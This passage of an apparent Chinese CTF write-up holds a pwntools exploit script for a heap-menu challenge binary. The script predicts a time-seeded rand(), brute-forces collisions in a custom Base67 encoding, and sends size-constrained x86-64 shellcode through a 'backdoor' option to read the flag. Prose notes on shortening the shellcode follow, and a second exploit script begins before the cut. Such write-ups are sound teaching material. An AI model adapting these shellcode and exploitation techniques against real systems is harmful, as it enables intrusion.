</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>proc <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;./pwn&#34;</span>
</span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>log_level <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;debug&#34;</span>
</span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>binary <span style="color:#f92672">=</span> proc
</span></span><span style="display:flex;"><span>elf <span style="color:#f92672">=</span> ELF(proc, checksec<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>)
</span></span><span style="display:flex;"><span>libc <span style="color:#f92672">=</span> ELF(<span style="color:#e6db74">&#34;./mylibc/libc.so.6&#34;</span>, checksec<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>)
</span></span><span style="display:flex;"><span>io <span style="color:#f92672">=</span> remote(<span style="color:#e6db74">&#34;tld1027.com&#34;</span>, <span style="color:#ae81ff">8999</span>) <span style="color:#66d9ef">if</span> argv[<span style="color:#ae81ff">1</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;r&#39;</span> <span style="color:#66d9ef">else</span> process(proc)
</span></span><span style="display:flex;"><span>mylibc <span style="color:#f92672">=</span> cdll<span style="color:#f92672">.</span>LoadLibrary(<span style="color:#e6db74">&#34;/lib/libc.so.6&#34;</span>)
</span></span><span style="display:flex;"><span>seed <span style="color:#f92672">=</span> mylibc<span style="color:#f92672">.</span>time(<span style="color:#ae81ff">0</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> args<span style="color:#f92672">.</span>G:
</span></span><span style="display:flex;"><span>    gdb<span style="color:#f92672">.</span>attach(io, <span style="color:#e6db74">&#34;b *$rebase(0x1b150)</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">b *$rebase(0x1b243)&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">calc_offset</span>(num, rhs):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> num <span style="color:#f92672">%</span> rhs <span style="color:#f92672">&gt;=</span> <span style="color:#ae81ff">0</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> num <span style="color:#f92672">%</span> rhs
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> rhs <span style="color:#f92672">&lt;</span> <span style="color:#ae81ff">0</span>:
</span></span><span style="display:flex;"><span>        temp <span style="color:#f92672">=</span> <span style="color:#f92672">-</span>rhs
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>        temp <span style="color:#f92672">=</span> rhs
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> temp <span style="color:#f92672">+</span> num <span style="color:#f92672">%</span> rhs
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Base67 编码函数</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">base67_encode</span>(data: bytes) <span style="color:#f92672">-&gt;</span> str:
</span></span><span style="display:flex;"><span>    BASE67_ALPHABET <span style="color:#f92672">=</span> table
</span></span><span style="display:flex;"><span>    encoded <span style="color:#f92672">=</span> []
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># 处理输入数据，按 3 字节为单位处理</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">0</span>, len(data), <span style="color:#ae81ff">3</span>):
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># 获取当前 3 字节</span>
</span></span><span style="display:flex;"><span>        chunk <span style="color:#f92672">=</span> data[i:i <span style="color:#f92672">+</span> <span style="color:#ae81ff">3</span>]
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># 补齐至 3 字节</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> len(chunk) <span style="color:#f92672">&lt;</span> <span style="color:#ae81ff">3</span>:
</span></span><span style="display:flex;"><span>            chunk <span style="color:#f92672">=</span> chunk<span style="color:#f92672">.</span>ljust(<span style="color:#ae81ff">3</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;</span><span style="color:#ae81ff">\0</span><span style="color:#e6db74">&#39;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># 将 3 字节合并为一个 24 位的整数</span>
</span></span><span style="display:flex;"><span>        combined <span style="color:#f92672">=</span> (chunk[<span style="color:#ae81ff">0</span>] <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">16</span>) <span style="color:#f92672">+</span> (chunk[<span style="color:#ae81ff">1</span>] <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">8</span>) <span style="color:#f92672">+</span> chunk[<span style="color:#ae81ff">2</span>]
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># 将 24 位整数拆分为 4 个 6 位的整数（Base67）</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">for</span> j <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">4</span>):
</span></span><span style="display:flex;"><span>            encoded<span style="color:#f92672">.</span>append(BASE67_ALPHABET[(combined <span style="color:#f92672">&gt;&gt;</span> (<span style="color:#ae81ff">18</span> <span style="color:#f92672">-</span> j <span style="color:#f92672">*</span> <span style="color:#ae81ff">6</span>)) <span style="color:#f92672">&amp;</span> <span style="color:#ae81ff">0x3F</span>])
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># 转换为字符串并返回</span>
</span></span><span style="display:flex;"><span>    res <span style="color:#f92672">=</span> (<span style="color:#e6db74">&#39;&#39;</span><span style="color:#f92672">.</span>join(encoded)<span style="color:#f92672">.</span>rstrip(<span style="color:#e6db74">&#34;=&#34;</span>))<span style="color:#f92672">.</span>encode()
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> res
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">base67_decode</span>(encoded_str):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> len(encoded_str) <span style="color:#f92672">%</span> <span style="color:#ae81ff">4</span> <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">raise</span> <span style="color:#a6e22e">ValueError</span>(<span style="color:#e6db74">&#34;Base67 编码长度必须是 4 的倍数&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    decoded_bytes <span style="color:#f92672">=</span> bytearray()  <span style="color:#75715e"># 用于存储解码后的字节数据</span>
</span></span><span style="display:flex;"><span>    bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>  <span style="color:#75715e"># 用于拼接解码后的 6 位块</span>
</span></span><span style="display:flex;"><span>    bit_count <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>  <span style="color:#75715e"># 用于追踪当前拼接的位数</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># 遍历编码字符串中的每个字符</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> char <span style="color:#f92672">in</span> encoded_str:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> char <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> char_to_value:
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">raise</span> <span style="color:#a6e22e">ValueError</span>(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;非法字符 </span><span style="color:#e6db74">{</span>char<span style="color:#e6db74">}</span><span style="color:#e6db74">，无法解码&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># 获取字符对应的值</span>
</span></span><span style="display:flex;"><span>        value <span style="color:#f92672">=</span> char_to_value[char]
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># 将该值转换为 6 位的二进制</span>
</span></span><span style="display:flex;"><span>        bits <span style="color:#f92672">=</span> (bits <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">6</span>) <span style="color:#f92672">|</span> value
</span></span><span style="display:flex;"><span>        bit_count <span style="color:#f92672">+=</span> <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># 每满 8 位（即一个字节），将它提取出来并保存</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">while</span> bit_count <span style="color:#f92672">&gt;=</span> <span style="color:#ae81ff">8</span>:
</span></span><span style="display:flex;"><span>            bit_count <span style="color:#f92672">-=</span> <span style="color:#ae81ff">8</span>
</span></span><span style="display:flex;"><span>            decoded_byte <span style="color:#f92672">=</span> (bits <span style="color:#f92672">&gt;&gt;</span> bit_count) <span style="color:#f92672">&amp;</span> <span style="color:#ae81ff">0xFF</span>  <span style="color:#75715e"># 获取当前字节</span>
</span></span><span style="display:flex;"><span>            decoded_bytes<span style="color:#f92672">.</span>append(decoded_byte)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> bytes(decoded_bytes)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">utf8_lossy_decode</span>(decoded_bytes):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">try</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># 使用 errors=&#39;replace&#39; 选项来替换无效字符</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> decoded_bytes<span style="color:#f92672">.</span>decode(<span style="color:#e6db74">&#39;utf-8&#39;</span>, errors<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;replace&#39;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">except</span> <span style="color:#a6e22e">UnicodeDecodeError</span> <span style="color:#66d9ef">as</span> e:
</span></span><span style="display:flex;"><span>        print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;解码错误: </span><span style="color:#e6db74">{</span>e<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#e6db74">&#39;&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># def judge(char1, char2, char3, char4):</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#     if table.find(char1) &gt;= 64 or tab</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">find_data</span>():
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># magic_cnt = 100</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># cnt = 0</span>
</span></span><span style="display:flex;"><span>    ans <span style="color:#f92672">=</span> dict()
</span></span><span style="display:flex;"><span>    base67_chars <span style="color:#f92672">=</span> table
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># print(base67_chars)</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> char1 <span style="color:#f92672">in</span> base67_chars:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">for</span> char2 <span style="color:#f92672">in</span> base67_chars:
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">for</span> char3 <span style="color:#f92672">in</span> base67_chars:
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">for</span> char4 <span style="color:#f92672">in</span> base67_chars:
</span></span><span style="display:flex;"><span>                    encoded_str <span style="color:#f92672">=</span> char1 <span style="color:#f92672">+</span> char2 <span style="color:#f92672">+</span> char3 <span style="color:#f92672">+</span> char4
</span></span><span style="display:flex;"><span>                    <span style="color:#66d9ef">try</span>:
</span></span><span style="display:flex;"><span>                        decoded_data <span style="color:#f92672">=</span> base67_decode(encoded_str)
</span></span><span style="display:flex;"><span>                        <span style="color:#66d9ef">if</span> (<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">in</span> decoded_data):
</span></span><span style="display:flex;"><span>                            <span style="color:#66d9ef">continue</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#75715e"># print(1)</span>
</span></span><span style="display:flex;"><span>                        decoded_string <span style="color:#f92672">=</span> decoded_data<span style="color:#f92672">.</span>decode(<span style="color:#e6db74">&#39;utf-8&#39;</span>, errors<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;strict&#39;</span>)
</span></span><span style="display:flex;"><span>                        <span style="color:#66d9ef">if</span> decoded_data <span style="color:#f92672">in</span> decoded_data_set:
</span></span><span style="display:flex;"><span>                            <span style="color:#66d9ef">if</span> decoded_data <span style="color:#f92672">==</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;</span><span style="color:#ae81ff">\t\x10</span><span style="color:#e6db74">1&#39;</span>:
</span></span><span style="display:flex;"><span>                                <span style="color:#66d9ef">return</span> (decoded_data, encoded_str, ans[decoded_data])
</span></span><span style="display:flex;"><span>                        <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>                            decoded_data_set<span style="color:#f92672">.</span>add(decoded_data)
</span></span><span style="display:flex;"><span>                            ans[decoded_data] <span style="color:#f92672">=</span> encoded_str
</span></span><span style="display:flex;"><span>                    <span style="color:#66d9ef">except</span> <span style="color:#a6e22e">ValueError</span> <span style="color:#66d9ef">as</span> E:
</span></span><span style="display:flex;"><span>                        <span style="color:#66d9ef">pass</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">choose</span>(choice):
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34; &gt; &#34;</span>)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendline(str(choice)<span style="color:#f92672">.</span>encode())
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">add</span>(idx, name, data):
</span></span><span style="display:flex;"><span>    choose(<span style="color:#ae81ff">1</span>)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;Idx &gt; &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode())
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;name &gt; &#34;</span>)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendline(name)
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># io.sendlineafter(b&#34;name &gt; &#34;, name)</span>
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;Message &gt; &#34;</span>, data)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">edit</span>(name, data):
</span></span><span style="display:flex;"><span>    choose(<span style="color:#ae81ff">4</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># io.sendlineafter(b&#34;Idx &gt; &#34;, str(idx).encode())</span>
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;name &gt; &#34;</span>, name)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;message &gt; &#34;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;WHAT CAN I SAY?!!!&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">backdoor</span>(idx, filename, shellcode):
</span></span><span style="display:flex;"><span>    choose(<span style="color:#ae81ff">666</span>)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;Idx &gt; &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode())
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;first &gt;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendline(filename)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;shellcode &gt;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>, shellcode)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">check_shellcode</span>(s):
</span></span><span style="display:flex;"><span>    ks <span style="color:#f92672">=</span> Ks(KS_ARCH_X86, KS_MODE_64)
</span></span><span style="display:flex;"><span>    encoding, count <span style="color:#f92672">=</span> ks<span style="color:#f92672">.</span>asm(s)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> i, byte <span style="color:#f92672">in</span> enumerate(encoding):
</span></span><span style="display:flex;"><span>        print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;0x</span><span style="color:#e6db74">{</span>byte<span style="color:#e6db74">:</span><span style="color:#e6db74">02x</span><span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>, end<span style="color:#f92672">=</span><span style="color:#e6db74">&#34; &#34;</span> <span style="color:#66d9ef">if</span> (i <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>) <span style="color:#f92672">%</span> <span style="color:#ae81ff">4</span> <span style="color:#66d9ef">else</span> <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    print(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    shellcode <span style="color:#f92672">=</span> asm(s)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(len(shellcode)):
</span></span><span style="display:flex;"><span>        print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;idx: </span><span style="color:#e6db74">{</span>i<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>, hex(shellcode[i]), shellcode[i] <span style="color:#f92672">%</span> <span style="color:#ae81ff">5</span>)
</span></span><span style="display:flex;"><span>    res <span style="color:#f92672">=</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(len(shellcode) <span style="color:#f92672">-</span> <span style="color:#ae81ff">2</span>):
</span></span><span style="display:flex;"><span>        tmp1 <span style="color:#f92672">=</span> shellcode[i] <span style="color:#f92672">%</span> <span style="color:#ae81ff">5</span>
</span></span><span style="display:flex;"><span>        tmp2 <span style="color:#f92672">=</span> shellcode[i <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>] <span style="color:#f92672">%</span> <span style="color:#ae81ff">5</span>
</span></span><span style="display:flex;"><span>        tmp3 <span style="color:#f92672">=</span> shellcode[i <span style="color:#f92672">+</span> <span style="color:#ae81ff">2</span>] <span style="color:#f92672">%</span> <span style="color:#ae81ff">5</span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># log.info(f&#34;{tmp1}, {tmp2}, {tmp3}&#34;)</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> (tmp1 <span style="color:#f92672">+</span> tmp2 <span style="color:#f92672">+</span> tmp3 <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">4</span>):
</span></span><span style="display:flex;"><span>            log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;i =&gt; </span><span style="color:#e6db74">{</span>i<span style="color:#e6db74">}</span><span style="color:#e6db74">, </span><span style="color:#e6db74">{</span>i <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span><span style="color:#e6db74">}</span><span style="color:#e6db74">, </span><span style="color:#e6db74">{</span>i <span style="color:#f92672">+</span> <span style="color:#ae81ff">2</span><span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>            res <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> res
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>mylibc<span style="color:#f92672">.</span>srand(seed)
</span></span><span style="display:flex;"><span>num <span style="color:#f92672">=</span> mylibc<span style="color:#f92672">.</span>rand()
</span></span><span style="display:flex;"><span>offset <span style="color:#f92672">=</span> calc_offset(num, <span style="color:#ae81ff">67</span>)
</span></span><span style="display:flex;"><span>log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;num =&gt; </span><span style="color:#e6db74">{</span>hex(num)<span style="color:#e6db74">}</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">offset =&gt; </span><span style="color:#e6db74">{</span>hex(offset)<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span><span style="color:#75715e"># print(2)</span>
</span></span><span style="display:flex;"><span>s <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;A+uP/07xRabdy2jzvr&gt;XLKD9sZ6O5HpctlVkShMCUfiNw3oG?eBTIJmqEQWg&lt;Y4Fn18&#34;</span>
</span></span><span style="display:flex;"><span>table <span style="color:#f92672">=</span> s[offset:] <span style="color:#f92672">+</span> s[:offset]
</span></span><span style="display:flex;"><span>log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;table =&gt; </span><span style="color:#e6db74">{</span>table<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>char_to_value <span style="color:#f92672">=</span> {char: idx <span style="color:#66d9ef">for</span> idx, char <span style="color:#f92672">in</span> enumerate(table)}
</span></span><span style="display:flex;"><span>decoded_data_set <span style="color:#f92672">=</span> set()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>data, msg1, msg2 <span style="color:#f92672">=</span> find_data()
</span></span><span style="display:flex;"><span>log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;data =&gt; </span><span style="color:#e6db74">{</span>data<span style="color:#e6db74">}</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">msg1 =&gt; </span><span style="color:#e6db74">{</span>msg1<span style="color:#e6db74">}</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">msg2 =&gt; </span><span style="color:#e6db74">{</span>msg2<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span><span style="color:#75715e"># io.sendlineafter(b&#34;username: &#34;, b&#34;xuzhengyang&#34;)</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># io.sendlineafter(b&#34;password: &#34;, b&#34;114514&#34;)</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>add(<span style="color:#ae81ff">0</span>, msg1<span style="color:#f92672">.</span>encode(), <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;bHAT CAN I SAY?!!!&#34;</span>)
</span></span><span style="display:flex;"><span>add(<span style="color:#ae81ff">1</span>, msg2<span style="color:#f92672">.</span>encode(), <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;bHAT CAN I SAY?!!!&#34;</span>)
</span></span><span style="display:flex;"><span>edit(msg2<span style="color:#f92672">.</span>encode(), <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;WHAT CAN I SAT?!!!&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>shellcode1 <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xchg rcx, fs:[rbx]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor eax, 0x37646973
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor eax, 0x50050515
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xchg dword ptr [rcx], eax
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">inc esi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xchg eax, esi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xchg eax, esi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">add rsi, rcx
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xchg rdi, rcx
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor eax, 82
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">syscall
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span>shellcode2 <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xchg rcx, fs:[rbx]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor edi, 6
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor edi, 5
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor edx, 0x50
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xchg rsi, rcx
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">syscall
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xchg eax, esp
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">xor eax, 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">dec edi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">syscall
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>payload <span style="color:#f92672">=</span> asm(shellcode1)
</span></span><span style="display:flex;"><span>payload <span style="color:#f92672">=</span> asm(shellcode2)
</span></span><span style="display:flex;"><span>backdoor(<span style="color:#ae81ff">0</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;lag&#34;</span>, payload)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>interactive()
</span></span></code></pre></div><p>比较有意思的是我写的那个 check_shellcode 函数，我用了 keystone 的 api，可以比较方便的把汇编解析为 16 进制，比较好用.</p>
<p>再者就是，当清空寄存器后（这个套路还比较常见），我之前的做法是调用一个 syscall 直接赋值，不过这次我用了另外一个 trick，<code>xchg rcx, fs:[rbx]</code>，可以给 rcx 一个可读写的地址。</p>
<p>但是远程就是另一回事了。</p>
<h3 id="126--127">1.26 / 1.27</h3>
<p>远程的 flag name 特别长，有 16 字节。这就很麻烦，我之前的打法是把 flag 用异或的办法存到寄存器里，而对于远程来讲，光异或就得 16 + 16 = 32 字节，显然超出了 31 字节的限制。</p>
<p>怎么办呢？一开始尝试了构造一次 read 读入 buf 里，但是发现 close(0)。</p>
<p>后来又想到，也许我可以 open(&quot;/dev/tty&quot;) 重新打开标准输入，，，but 也不行。</p>
<p>后来 t1d 提醒说其实可以直接通过第一次 getdent 时读到的目录里➕一个偏移到 flag name 就好了。</p>
<p>那就比较简单了。 我最后写了一个 26 字节的 shellcode 出来，我非常满意这个结果，因为 t1d 说他写了 30 字节的 shellcode，还需要一定程度的爆破与调试，而我的不仅比他短，还不需要调试。</p>
<p>最终的 exp:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> sys <span style="color:#f92672">import</span> argv
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> ctypes <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> string
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> keystone <span style="color:#f92672">import</span> Ks, KS_ARCH_X86, KS_MODE_64
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># proc = [&#34;seccomp-tools&#34;, &#34;dump&#34;, &#34;./pwn&#34;]</span>
</span></span><span style="display:flex;"><span>proc <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;./pwn&#34;</span>
</span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>log_level <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;info&#34;</span>
